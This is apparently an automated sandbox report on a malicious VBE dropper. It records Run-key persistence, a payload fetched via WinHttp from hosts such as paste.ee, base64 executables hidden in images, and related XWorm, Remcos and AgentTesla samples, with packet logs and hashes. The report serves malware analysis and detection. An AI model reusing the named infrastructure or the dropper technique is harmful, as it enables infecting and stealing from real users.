Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	dereac.vbe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winVBE@11/8@3/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 2 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4600 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6392 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: dereac.vbe

Simulations

Behavior and APIs

Time	Type	Description
21:13:50	API Interceptor	2x Sleep call for process: wscript.exe modified
21:13:51	API Interceptor	47x Sleep call for process: powershell.exe modified
21:13:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name.vbs
21:14:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.84.67	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/cJo7v
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/EgkAG
	87645345.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/IJGyf
	182763543.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/0kkOm
	PaymentEUR41000.xls	Get hash	malicious	Remcos	Browse	paste.ee/d/oVqcS
	RFQ-#Uacac#Uc801#Uc758#Ub8b0#Uc11c-#Uacac#Uc801#Uc758#Ub8b0#Uc11c.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/6VwxD
	240202PIMXF24C.docx.doc	Get hash	malicious	Remcos	Browse	paste.ee/d/wPDYR
	Purchase Order202428 (1).xls	Get hash	malicious	Remcos	Browse	paste.ee/d/pQbyK
	Applicazione di pagamento.docx.doc	Get hash	malicious	Remcos	Browse	paste.ee/d/7tUhO
172.67.215.45	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse
	wsf.zip	Get hash	malicious	Remcos	Browse
	66432890.vbs	Get hash	malicious	Unknown	Browse
	1e#U041e.vbs	Get hash	malicious	AgentTesla	Browse
	751652433.vbs	Get hash	malicious	XWorm	Browse
	PaymentEUR41000.xls	Get hash	malicious	Remcos	Browse
	orden00878t9.xlam.xlsx	Get hash	malicious	AgentTesla	Browse
	Purchase Order202428 (1).xls	Get hash	malicious	Remcos	Browse
	CONSULTA DE PRECIOS DE CEPROMA.xlam.xlsx	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
paste.ee	Name.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	517209487.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	wsf.zip	Get hash	malicious	Remcos	Browse	104.21.84.67
	screen_shots.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	wsf.zip	Get hash	malicious	Remcos	Browse	172.67.187.200
	66432890.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	87645345.vbs	Get hash	malicious	XWorm	Browse	104.21.84.67
uploaddeimagens.com.br	Name.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	517209487.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	wsf.zip	Get hash	malicious	Remcos	Browse	172.67.215.45
	66432890.vbs	Get hash	malicious	Unknown	Browse	172.67.215.45
	87645345.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	1e#U041e.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	751652433.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Remittance advice payment PC - ID 30781-20733-1691072900.html	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	Name.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138
	comparendo24755693025simitverenlineacgbindata.exe	Get hash	malicious	PureLog Stealer, Quasar, Thanos	Browse	172.67.34.170
	https://cilkonlay.com/	Get hash	malicious	Unknown	Browse	172.67.207.141
	https://apiv2.kol.eco/builder-redirect?url=https://unlock-my-door.com.au/makek-wisfc6d/edc98-smill/jeiqjeiqjeiqjeiqjeiq/amFyZWQuY2hlc2xleUBtYnUuZWR1	Get hash	malicious	Unknown	Browse	172.67.200.246
	pdfcentral (1).exe	Get hash	malicious	Unknown	Browse	172.64.151.101
	pdfcentral.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Payroll- 2122024 .html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	rooming list.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://ecv.microsoft.com/gsRXGbxrdE	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.21.30.251
CLOUDFLARENETUS	Remittance advice payment PC - ID 30781-20733-1691072900.html	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	Name.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138
	comparendo24755693025simitverenlineacgbindata.exe	Get hash	malicious	PureLog Stealer, Quasar, Thanos	Browse	172.67.34.170
	https://cilkonlay.com/	Get hash	malicious	Unknown	Browse	172.67.207.141
	https://apiv2.kol.eco/builder-redirect?url=https://unlock-my-door.com.au/makek-wisfc6d/edc98-smill/jeiqjeiqjeiqjeiqjeiq/amFyZWQuY2hlc2xleUBtYnUuZWR1	Get hash	malicious	Unknown	Browse	172.67.200.246
	pdfcentral (1).exe	Get hash	malicious	Unknown	Browse	172.64.151.101
	pdfcentral.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Payroll- 2122024 .html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	rooming list.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://ecv.microsoft.com/gsRXGbxrdE	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.21.30.251

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Name.vbs	Get hash	malicious	Unknown	Browse	172.67.215.45
	pdfcentral (1).exe	Get hash	malicious	Unknown	Browse	172.67.215.45
	pdfcentral.exe	Get hash	malicious	Unknown	Browse	172.67.215.45
	rooming list.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	https://dentiland.com.mx/Message%20Centre/mc.php	Get hash	malicious	HTMLPhisher	Browse	172.67.215.45
	RFQ202402 PDF.bat.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	https://onn2tech.com/	Get hash	malicious	Unknown	Browse	172.67.215.45
	02-13-2024.html	Get hash	malicious	HTMLPhisher	Browse	172.67.215.45
	_Factura_623199941314391_PDF_.js.malware.js	Get hash	malicious	Unknown	Browse	172.67.215.45
	_Factura_623199941314391_PDF_.js.malware.js	Get hash	malicious	Unknown	Browse	172.67.215.45
a0e9f5d64349fb13191bc781f81f42e1	Name.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	FW DOE-GSA Procurement Notice For Newton Crouch Company - IW8637892.msg	Get hash	malicious	Unknown	Browse	104.21.84.67
	file.exe	Get hash	malicious	LummaC	Browse	104.21.84.67
	file.exe	Get hash	malicious	LummaC	Browse	104.21.84.67
	file.exe	Get hash	malicious	LummaC	Browse	104.21.84.67
	file.exe	Get hash	malicious	LummaC	Browse	104.21.84.67
	reservas-8882229.ppam	Get hash	malicious	Unknown	Browse	104.21.84.67
	file.exe	Get hash	malicious	RedLine, RisePro Stealer	Browse	104.21.84.67
	517209487.vbs	Get hash	malicious	XWorm	Browse	104.21.84.67
	Check Lists_01_TMP.xls	Get hash	malicious	Unknown	Browse	104.21.84.67

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	204074
Entropy (8bit):	5.16860231694857
Encrypted:	false
SSDEEP:	3072:A5yO1lQ014Cet1ns3wflGsZcfwMQA5PGzb8h9:A591lF1UflGsZcfb
MD5:	85CBF9B1A0E3D8FDA14A86535E0692D9
SHA1:	695EAA69C8766E01720DEC322064EE968812F264
SHA-256:	AD4AC01243A9775D26945CF742A06ACB03F34056FEE9576D646FF65617BF94F5
SHA-512:	0EECAD4E71E37B7D387938388D30589D7AE737885EB14F83813F85F9B910AC339BA8E37A9418A050AB842E0298142A5061092A261D1CF1B4C0500E6A64E84C52
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' VBScript Source File..'..' Script Name: winrm.vbs..'....Option Explicit....'''''''''''''''''''''..' Error codes..private const ERR_OK = 0..private const ERR_GENERAL_FAILURE = 1....'''''''''''''''''''''..' Messages..private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."..private const L_UNKOPNM_Message = "Unknown operation name: "..private const L_OP_Message = "Operation - "..private const L_NOFILE_Message = "File does not exist: "..private const L_PARZERO_Message = "Parameter is zero length #"..private const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "..private const L_UNKOPT_ErrorMessage = "Unknown switch: "..private const L_BLANKOPT_ErrorMessage = "Missing switch name"..private const L_UNKOPT_GenMessage = "Invalid use of command line. Type ""winrm -?"" for help."..private const L_HELP_GenMessage

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul774/lL:NllUwt
MD5:	3BD40D4BDD7802424FE8F2DC2A41C196
SHA1:	88F355EA9D58C5A00B2EBB0DC3127C0C13052631
SHA-256:	FCF55501F03C9B5E24796B8FE3656143E97D7A5FD0300387C1960C226C74076A
SHA-512:	67734D54D327379C259DB7E0576BE2A4B597CB2F0B9E881AA1FC2B55F375BB5862122579B0B5EC7DED7A7875C2AC7668033355772CBB8311A8A86924153D59B2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qx4gdqf.o3h.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzmsrrn5.j1g.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncrvk415.1ci.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa0kiksk.2zz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1exgplu.wpu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txcdfupu.bmd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.4527969137371404
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	dereac.vbe
File size:	2'860 bytes
MD5:	3d1704a957f700472678bc83d9d6abcb
SHA1:	493d07d67ae25cd468c23ed446341512aa5d8d83
SHA256:	8bbe9ce696b004ed6b45f992470d99e093c4d463c7d1bdc80d50f071ab164a85
SHA512:	80a28e49bb084d8e367f7e33b77142ecdda62f5d585da68d3676061c1687248f4c2e297eb2347f32f6dcb1efbfea45cc31766e7ea26b1b61c5ba315ab156e5b1
SSDEEP:	48:7lTWtR6UF05lnGz4XoUN7xYUhOzkLjg56WLukL9rnW5ATvFrUJdToqv9oxLv6Ffl:7lTQ6UF0tXdhF3WlNWKAhocoof8fY5
TLSH:	96515E026BE86B0DF6F357186BB460A60E6BBE56B539C24D1098098C4FF3B504C65FB3
File Content Preview:	..p.o.s.t.e. .=. . .(.I.n.t.(.(.c.y.p.a.r.i.s.s.o.-.p.a.g.a.m.e.n.t.o.+.1.).*.R.n.d.+.p.a.g.a.m.e.n.t.o.).).....d.i.m. .g.i.g.o.....g.i.g.o.=. .f.a.l.s.e.....S.e.t. .e.s.g.o.t.a.n.t.e. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.i.n.H.t.t.p...W.i.n.H.t.t.p.R.e.q.u

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
172.67.215.45192.168.2.6443497012018856 02/13/24-21:13:54.637091	TCP	2018856	ET TROJAN Windows executable base64 encoded	443	49701	172.67.215.45	192.168.2.6
172.67.215.45192.168.2.6443497012049038 02/13/24-21:13:55.113335	TCP	2049038	ET TROJAN Malicious Base64 Encoded Payload In Image	443	49701	172.67.215.45	192.168.2.6
172.67.215.45192.168.2.6443497012047750 02/13/24-21:13:54.637091	TCP	2047750	ET TROJAN Base64 Encoded MZ In Image	443	49701	172.67.215.45	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 13, 2024 21:13:49.799809933 CET	49699	80	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:49.916834116 CET	80	49699	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:49.916933060 CET	49699	80	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:49.917215109 CET	49699	80	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.034197092 CET	80	49699	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.108501911 CET	80	49699	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.108516932 CET	80	49699	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.108622074 CET	49699	80	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.110263109 CET	49699	80	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.111507893 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.111603975 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.111716986 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.114156008 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.114192009 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.374144077 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.374442101 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.378218889 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.378248930 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.378722906 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.429836988 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.474284887 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.517904997 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.776160002 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.776288986 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.776380062 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.776444912 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.776484966 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.776549101 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.776560068 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.776662111 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.776707888 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.776716948 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.799758911 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.799841881 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.799917936 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.799918890 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.799952984 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.800147057 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.800169945 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.800259113 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.800620079 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.800661087 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:50.800699949 CET	49700	443	192.168.2.6	104.21.84.67
Feb 13, 2024 21:13:50.800715923 CET	443	49700	104.21.84.67	192.168.2.6
Feb 13, 2024 21:13:53.599561930 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:53.599600077 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:53.599674940 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:53.614012003 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:53.614032030 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:53.865098000 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:53.865401983 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:53.869155884 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:53.869164944 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:53.869498968 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:53.878299952 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:53.921910048 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.141187906 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.141222954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.141242027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.141259909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.141345024 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.141365051 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.141386986 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.141405106 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.141474009 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.141498089 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.141531944 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.142076969 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.142097950 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.142122030 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.142127991 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.142139912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.142184973 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.142905951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.142927885 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.142949104 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.142950058 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.142959118 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.142995119 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.143004894 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.143049002 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.143650055 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.143687963 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.143714905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.143728971 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.143738985 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.143791914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.144573927 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.144646883 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.144681931 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.144695997 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.144705057 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.144754887 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.144762993 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.145337105 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.145358086 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.145380974 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.145381927 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.145391941 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.145417929 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.146219015 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.146240950 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.146259069 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.146265030 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.146272898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.146297932 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.146987915 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.147032976 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.147041082 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.147085905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.147109985 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.147129059 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.147134066 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.147141933 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.147172928 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.147754908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.147799015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.147842884 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.147895098 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.258475065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.258569002 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.259115934 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.259171009 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.259195089 CET	443	49701	172.67.215.45	192.168.2.6
